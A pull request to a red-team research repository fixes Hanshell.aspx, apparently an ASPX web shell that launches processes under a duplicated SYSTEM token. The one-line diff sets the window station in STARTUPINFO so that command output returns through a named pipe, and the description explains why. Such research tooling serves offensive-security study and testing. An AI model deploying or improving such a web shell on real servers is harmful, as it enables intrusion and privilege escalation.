### PR TITLE
Fix Windows Station on StartupInfo

### DIFF
--- a/Hanshell/Hanshell.aspx
+++ b/Hanshell/Hanshell.aspx
@@ -288,6 +288,7 @@
 	    si.cb = Marshal.SizeOf(typeof(STARTUPINFO));
 	    si.hStdOutput = out_write;
 	    si.hStdError = err_write;
+            si.lpDesktop = @"WinSta0\Default";
 	    si.dwFlags |= 0x00000100;
 
 	    if (!DuplicateTokenEx(token, dwTokenRights, ref securityAttr, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out hPrimaryToken))


### PR DESCRIPTION
Regarding the bug reported here: https://github.com/blackarrowsec/redteam-research/issues/4

I have found the solution to the problem. It seems that the default Window Station (`WinSta0\Default`) was not defined in the StartupInfo structure of the process. I don't know exactly why, but my theory is that:

By launching the process with the primary token of SYSTEM, and not specifying a desktop, then it is not possible to communicate the output of that process through the Namedpipe because they are not on the same desktop.

![2023-01-17_17-48](https://user-images.githubusercontent.com/23587075/212965663-2feabb6d-6fae-4227-a4af-19b153332e2b.png)

Link: https://learn.microsoft.com/en-us/windows/win32/winstation/window-station-and-desktop-creation